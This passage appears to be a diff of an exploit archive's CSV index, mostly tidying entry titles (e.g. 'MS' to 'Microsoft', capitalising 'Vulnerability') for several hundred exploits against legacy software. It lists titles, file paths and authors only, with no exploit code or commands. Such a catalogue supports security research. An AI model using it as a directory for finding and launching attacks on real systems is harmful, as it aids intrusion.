20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 permissions File Manipulation Vulnerability",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability",2000-10-03,"BindView's Razor Team",windows,local,0 -20266,platforms/windows/remote/20266.txt,"MS Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 +20266,platforms/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 20268,platforms/php/webapps/20268.txt,"Tickets CAD 2.20G Multiple Vulnerabilities",2012-08-05,chap0,php,webapps,0 20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability",2000-10-04,"David Litchfield",windows,remote,0 20270,platforms/php/webapps/20270.txt,"Wordpress Plugin Effective Lead Management 3.0.0 - Persistent XSS",2012-08-05,"Chris Kellum",php,webapps,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x Pending ARP Request Remote DoS Vulnerability",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability",1998-08-02,L.Facq,windows,dos,0 -20273,platforms/cgi/remote/20273.txt,"Moreover CGI script 0 File Disclosure Vulnerability",2000-10-02,CDI,cgi,remote,0 +20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure Vulnerability",2000-10-02,CDI,cgi,remote,0 20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password Vulnerability",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'iplncal.sh' Permissions Vulnerability",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'csstart' Vulnerability",2000-10-10,@stake,solaris,local,0 20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 Path Traversal Vulnerability",2000-07-18,pestilence,cgi,remote,0 -20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal vulnerability",2000-10-07,Synnergy.net,php,webapps,0 -20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal vulnerability",2000-10-09,f0bic,cgi,remote,0 -20280,platforms/cgi/remote/20280.txt,"bytes interactive web shopper 1.0/2.0 - Directory Traversal vulnerability",2000-10-08,f0bic,cgi,remote,0 -20281,platforms/cgi/remote/20281.txt,"hassan consulting shopping cart 1.18 - Directory Traversal vulnerability",2000-10-07,f0bic,cgi,remote,0 +20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal Vulnerability",2000-10-07,Synnergy.net,php,webapps,0 +20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal Vulnerability",2000-10-09,f0bic,cgi,remote,0 +20280,platforms/cgi/remote/20280.txt,"bytes interactive web shopper 1.0/2.0 - Directory Traversal Vulnerability",2000-10-08,f0bic,cgi,remote,0 +20281,platforms/cgi/remote/20281.txt,"hassan consulting shopping cart 1.18 - Directory Traversal Vulnerability",2000-10-07,f0bic,cgi,remote,0 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 DoS Vulnerability",2000-10-09,zillion,windows,dos,0 20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1)",2000-10-10,stickler,windows,remote,0 20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 @@ -17584,7 +17584,7 @@ id,file,description,date,author,platform,type,port 20286,platforms/php/remote/20286.c,"PHP 3.0/4.0 Error Logging Format String Vulnerability",2000-10-12,anonymous,php,remote,0 20287,platforms/windows/remote/20287.c,"Nevis Systems All-Mail 1.1 - Buffer Overflow Vulnerability",2000-10-10,@stake,windows,remote,0 20288,platforms/windows/remote/20288.c,"Microsoft Windows 9x File Handle Buffer Overflow Vulnerability",2000-07-10,Nsfocus,windows,remote,0 -20289,platforms/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 Remote Desktop Sharing DoS Vulnerability",2000-10-13,"Kirk Corey",windows,dos,0 +20289,platforms/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 - Remote Desktop Sharing DoS Vulnerability",2000-10-13,"Kirk Corey",windows,dos,0 20290,platforms/aix/local/20290.txt,"AIX 3.x bugfiler Arbitrary File Creation Vulnerability",1997-09-08,"Johannes Schwabe",aix,local,0 20291,platforms/linux/local/20291.sh,"Elm 2.4 'filter' Arbitrary Mail Disclosure Vulnerability",1995-12-26,"David J Meltzer",linux,local,0 20292,platforms/freebsd/remote/20292.pl,"cURL 6.1 - 7.4 - Remote Buffer Overflow Vulnerability (1)",2000-10-13,zillion,freebsd,remote,0 @@ -17593,11 +17593,11 @@ id,file,description,date,author,platform,type,port 20295,platforms/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution",2012-08-06,rgod,windows,dos,0 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0 20297,platforms/windows/remote/20297.rb,"Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,metasploit,windows,remote,0 -20298,platforms/windows/remote/20298.c,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 -20299,platforms/windows/remote/20299.pl,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 -20300,platforms/windows/remote/20300.c,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3)",2000-10-17,zipo,windows,remote,0 -20301,platforms/windows/remote/20301.php,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4)",2000-10-17,BoloTron,windows,remote,0 -20302,platforms/windows/remote/20302.pl,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5)",2000-10-17,"Andrea Spabam",windows,remote,0 +20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 +20299,platforms/windows/remote/20299.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (2)",2000-10-21,"Roelof Temmingh",windows,remote,0 +20300,platforms/windows/remote/20300.c,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3)",2000-10-17,zipo,windows,remote,0 +20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4)",2000-10-17,BoloTron,windows,remote,0 +20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 Arbitrary File Disclosure Vulnerability",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service Vulnerability",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability",1999-01-30,Mnemonix,windows,remote,0 @@ -17695,7 +17695,7 @@ id,file,description,date,author,platform,type,port 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 Arbitrary File Deletion Vulnerability",2012-08-10,GoLd_M,php,webapps,0 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/remote/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 DoS Vulnerability",2000-11-10,sozni,cgi,remote,0 -20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 MS Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 +20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0 20403,platforms/windows/remote/20403.txt,"Small HTTP server 2.0 1 Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,remote,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0 @@ -17726,7 +17726,7 @@ id,file,description,date,author,platform,type,port 20431,platforms/php/webapps/20431.txt,"Phorum 3.x Arbitrary File Read Vulnerability",2000-11-24,"Joao Gouveia",php,webapps,0 20432,platforms/windows/local/20432.txt,"Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,local,0 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter Vulnerability",1999-11-09,"Cody T. - hhp",cgi,remote,0 -20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0 +20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability",1996-04-01,@stake,cgi,remote,0 20436,platforms/unix/local/20436.sh,"Mac OS X 10,HP-UX 9/10/11,Mandriva 6/7,RedHat 5/6,SCO 5,IRIX 6 Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 @@ -17761,7 +17761,7 @@ id,file,description,date,author,platform,type,port 20466,platforms/multiple/remote/20466.txt,"Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability",2000-12-06,"china nsl",multiple,remote,0 20467,platforms/multiple/remote/20467.txt,"Inktomi Search Software 3.0 Source Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0 -20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0..x Remote Arbitrary Command Execution Vulnerability",2000-12-06,"Secure Reality Advisories",unix,remote,0 +20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0..x - Remote Arbitrary Command Execution Vulnerability",2000-12-06,"Secure Reality Advisories",unix,remote,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability",2000-12-05,benjurry,windows,dos,0 20472,platforms/multiple/remote/20472.txt,"IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x,Catalyst 5000 4.5/5.x,Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 @@ -17775,10 +17775,10 @@ id,file,description,date,author,platform,type,port 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 websendmail Remote Command Execution Vulnerability",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability",1997-01-06,"Solar Designer",windows,dos,0 20485,platforms/osx/local/20485.sh,"OS X Viscosity OpenVPN Client - Local Root Exploit",2012-08-13,zx2c4,osx,local,0 -20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x Cross-Site Request Forgery Vulnerability",1997-01-01,anonymous,unix,remote,0 +20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery Vulnerability",1997-01-01,anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service Vulnerability",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x File System Disclosure Vulnerability",2000-12-07,Dodger,windows,remote,0 -20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal vulnerability",2000-12-07,"SNS Research",windows,remote,0 +20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal Vulnerability",2000-12-07,"SNS Research",windows,remote,0 20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 DNS Buffer Overflow Vulnerability",2000-12-04,nimrood,unix,remote,0 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 Arbitrary Proxy Usage Vulnerability",2000-12-08,"Jouko Pynnonen",multiple,remote,0 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String Vulnerability",2000-12-11,c0ncept,unix,remote,0 @@ -17794,7 +17794,7 @@ id,file,description,date,author,platform,type,port 20504,platforms/cgi/remote/20504.html,"Leif M. Wright ad.cgi 1.0 Unchecked Input Vulnerability",2000-12-11,rpc,cgi,remote,0 20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 PIN Brute-Force Vulnerability",2000-12-14,@stake,palm_os,local,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution Vulnerability",2000-12-14,suid,cgi,remote,0 -20507,platforms/multiple/remote/20507.txt,"alex heiphetz group ezshopper 2.0/3.0 - Directory Traversal vulnerability",2000-12-13,Nsfocus,multiple,remote,0 +20507,platforms/multiple/remote/20507.txt,"alex heiphetz group ezshopper 2.0/3.0 - Directory Traversal Vulnerability",2000-12-13,Nsfocus,multiple,remote,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 'aim://' Buffer Overflow Vulnerability",2000-12-12,"Joe Testa",windows,remote,0 @@ -17816,8 +17816,8 @@ id,file,description,date,author,platform,type,port 20526,platforms/unix/local/20526.c,"GTK+ 1.2.8 Arbitrary Loadable Module Execution Vulnerability",2001-01-02,V9,unix,local,0 20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access Vulnerability",2000-12-30,isno,cgi,remote,0 20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 Javascript URL Vulnerability",2001-01-01,"Georgi Guninski",windows,remote,0 -20529,platforms/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x Directory Traversal Vulnerability (1)",2001-01-15,"Michael Smith",multiple,remote,0 -20530,platforms/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x Directory Traversal Vulnerability (2)",2001-01-05,"Georgi Guninski",multiple,remote,0 +20529,platforms/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal Vulnerability (1)",2001-01-15,"Michael Smith",multiple,remote,0 +20530,platforms/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x - Directory Traversal Vulnerability (2)",2001-01-05,"Georgi Guninski",multiple,remote,0 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 AfpaCache/WebSphereNet.Data DoS Vulnerability",2001-01-08,"Peter Grundl",multiple,dos,0 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x Firewall Denial of Service Vulnerability",2001-01-08,Nsfocus,sco,dos,0 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0 @@ -17852,7 +17852,7 @@ id,file,description,date,author,platform,type,port 20564,platforms/windows/dos/20564.txt,"Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability",1997-10-07,CRouland,windows,dos,0 20565,platforms/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability",1997-12-08,sili,hardware,remote,0 20566,platforms/linux/dos/20566.c,"Linux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability",1997-12-08,"John McDonald",linux,dos,0 -20567,platforms/cgi/remote/20567.txt,"php php/fi 2.0 - Directory Traversal vulnerability",1997-04-16,Shamanski,cgi,remote,0 +20567,platforms/cgi/remote/20567.txt,"php php/fi 2.0 - Directory Traversal Vulnerability",1997-04-16,Shamanski,cgi,remote,0 20568,platforms/sco/remote/20568.txt,"Skunkware 2.0 view-source Directory Traversal Vulnerability",1997-04-16,myst,sco,remote,0 20569,platforms/linux/remote/20569.c,"mICQ 0.4.6 - Remote Buffer Overflow Vulnerability",2001-01-17,"tHE rECIdjVO",linux,remote,0 20570,platforms/cgi/remote/20570.txt,"Sambar Server 4.1 beta Admin Access Vulnerability",1998-06-10,"Michiel de Weerd",cgi,remote,0 @@ -17867,8 +17867,8 @@ id,file,description,date,author,platform,type,port 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x Local Buffer Overflow Vulnerability",2001-01-18,"Luis Miguel Silva",linux,local,0 20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 print_client() Format String Vulnerability",2001-01-21,CyRaX,windows,remote,0 20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 Arbitrary Command Execution Vulnerability",1998-06-24,"Doru Petrescu",cgi,remote,0 -20584,platforms/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal vulnerability",2001-01-22,"SNS Research",windows,remote,0 -20585,platforms/windows/local/20585.txt,"localweb2000 1.1 - Directory Traversal vulnerability",2001-01-22,"SNS Research",windows,local,0 +20584,platforms/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal Vulnerability",2001-01-22,"SNS Research",windows,remote,0 +20585,platforms/windows/local/20585.txt,"localweb2000 1.1 - Directory Traversal Vulnerability",2001-01-22,"SNS Research",windows,local,0 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 admin.php3 Unverified Administrative Password Change Vulnerability",2000-01-06,"Max Vision",php,webapps,0 20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 Arbitrary Email Relay Vulnerability",2000-01-01,"Max Vision",php,webapps,0 20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 @@ -17884,43 +17884,43 @@ id,file,description,date,author,platform,type,port 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0 20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT Remote root Vulnerability",1994-02-24,CIAC,unix,remote,0 20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 SMTP Buffer Overflow Vulnerability",1999-02-13,_mcp_,windows,remote,0 -20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal vulnerability",2001-01-28,"MC GaN",multiple,remote,0 +20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal Vulnerability",2001-01-28,"MC GaN",multiple,remote,0 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 ximp40 Library Buffer Overflow Vulnerability",2001-01-31,UNYUN,solaris,local,0 20604,platforms/linux/local/20604.sh,"Debian 2.2,S.u.S.E 6.3/6.4/7.0 man -l Format String Vulnerability",2001-01-31,IhaQueR,linux,local,0 20605,platforms/windows/remote/20605.cpp,"Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability",2012-08-18,UNYUN,windows,remote,0 -20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x Remote Buffer Overflow Vulnerability",2000-03-26,"Jin Ho You",cgi,remote,0 -20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal vulnerability",2001-02-02,"Sergey Nenashev",windows,remote,0 -20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal vulnerability",2001-02-04,"Joe Testa",windows,remote,0 +20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow Vulnerability",2000-03-26,"Jin Ho You",cgi,remote,0 +20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal Vulnerability",2001-02-02,"Sergey Nenashev",windows,remote,0 +20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal Vulnerability",2001-02-04,"Joe Testa",windows,remote,0 20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 Path Disclosure Vulnerability",2001-02-04,"Joe Testa",cgi,remote,0 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet DoS Vulnerability",2000-10-31,"Allaire Security",multiple,dos,0 -20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal vulnerability",2000-10-13,pestilence,cgi,remote,0 -20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal vulnerability",2001-02-05,joetesta,windows,remote,0 +20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal Vulnerability",2000-10-13,pestilence,cgi,remote,0 +20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal Vulnerability",2001-02-05,joetesta,windows,remote,0 20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS Vulnerability",2001-02-06,"Georgi Guninski",windows,dos,0 -20614,platforms/windows/remote/20614.txt,"aolserver 3.2 win32 - Directory Traversal vulnerability",2001-02-06,joetesta,windows,remote,0 +20614,platforms/windows/remote/20614.txt,"aolserver 3.2 win32 - Directory Traversal Vulnerability",2001-02-06,joetesta,windows,remote,0 20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 Daemon Logging Failure Vulnerability",2001-02-05,"Jose Nazario",unix,remote,0 -20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal vulnerability",2001-02-07,joetesta,windows,remote,0 +20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal Vulnerability",2001-02-07,joetesta,windows,remote,0 20617,platforms/unix/remote/20617.c,"SSH 1.2.x CRC-32 Compensation Attack Detector Vulnerability",2001-02-08,"Michal Zalewski",unix,remote,0 20618,platforms/multiple/remote/20618.txt,"IBM Net.Commerce 2.0/3.x/4.x orderdspc.d2w order_rn Option SQL Injection",2001-02-05,"Rudi Carell",multiple,remote,0 20619,platforms/linux/remote/20619.c,"Linuxconf 1.1.6 r10 Remote Buffer Overflow Vulnerablity",1999-12-21,R00T-X,linux,remote,0 20620,platforms/sco/remote/20620.c,"SCO UNIX 5 calserver Remote Buffer Overflow Vulnerability",1998-12-29,"Leshka Zakharoff",sco,remote,0 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 Arbitrary Command Execution Vulnerability",2001-02-12,"Dixie Flatline",unix,local,0 20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands Vulnerability",2001-02-01,isno,linux,remote,0 -20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal vulnerability",2001-02-12,slipy,cgi,remote,0 +20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal Vulnerability",2001-02-12,slipy,cgi,remote,0 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 File Disclosure Vulnerability",2001-02-12,cuctema,multiple,remote,0 20626,platforms/linux/local/20626.c,"Linux sysctl() Kernel 2.2.x Memory Reading Vulnerability",2001-02-09,"Chris Evans",linux,local,0 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0 -20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal vulnerability",2001-02-12,cuctema,windows,remote,0 +20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal Vulnerability",2001-02-12,cuctema,windows,remote,0 20629,platforms/cgi/remote/20629.txt,"Way-Board 2.0 File Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 20630,platforms/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 File Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 20631,platforms/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,cgi,remote,0 20632,platforms/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote,0 20633,platforms/cgi/remote/20633.txt,"Brightstation Muscat 1.0 Root Path Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 20634,platforms/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 - Buffer Overflow Vulnerability",2001-02-15,joetesta,windows,dos,0 -20635,platforms/multiple/remote/20635.txt,"caucho technology resin 1.2 - Directory Traversal vulnerability",2001-02-16,joetesta,multiple,remote,0 -20636,platforms/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal vulnerability",2001-02-16,slipy,linux,remote,0 -20637,platforms/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal vulnerability",2001-02-16,slipy,windows,remote,0 +20635,platforms/multiple/remote/20635.txt,"caucho technology resin 1.2 - Directory Traversal Vulnerability",2001-02-16,joetesta,multiple,remote,0 +20636,platforms/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal Vulnerability",2001-02-16,slipy,linux,remote,0 +20637,platforms/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal Vulnerability",2001-02-16,slipy,windows,remote,0 20638,platforms/multiple/remote/20638.txt,"Bajie Webserver 0.78/0.90 Remote Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 20639,platforms/multiple/remote/20639.txt,"Bajie 0.78 Arbitrary Shell Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 Path Disclosure Vulnerability",2001-02-20,"SNS Research",windows,remote,0 @@ -17934,25 +17934,25 @@ id,file,description,date,author,platform,type,port 20648,platforms/solaris/remote/20648.c,"Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability",2001-03-15,"Last Stage of Delirium",solaris,remote,0 20649,platforms/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability (msf)",2001-03-15,vlad902,solaris,remote,0 20650,platforms/windows/dos/20650.txt,"Sapio WebReflex 1.55 GET Denial of Service Vulnerability",2001-02-27,slipy,windows,dos,0 -20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal vulnerability",2001-02-28,joetesta,windows,local,0 +20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal Vulnerability",2001-02-28,joetesta,windows,local,0 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 ILMI SNMP Community String Vulnerability",2001-02-27,pask,hardware,remote,0 20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 Unauthorized File Access Vulnerability",2001-03-02,se00020,windows,remote,0 20654,platforms/hardware/remote/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 Telnet Administration DoS",2001-02-26,altomo,hardware,remote,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 DoS Vulnerability",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/remote/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service Vulnerability",2001-02-27,slipy,windows,remote,0 -20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal vulnerability",2001-02-27,slipy,windows,remote,0 +20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal Vulnerability",2001-02-27,slipy,windows,remote,0 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 .joerc Arbitrary Command Execution Vulnerability",2001-02-28,"Wkit Security",unix,local,0 20659,platforms/multiple/remote/20659.txt,"Netwin SurgeFTP 1.0 b Malformed Request Denial of Service Vulnerability",2001-03-01,"the Strumpf Noir 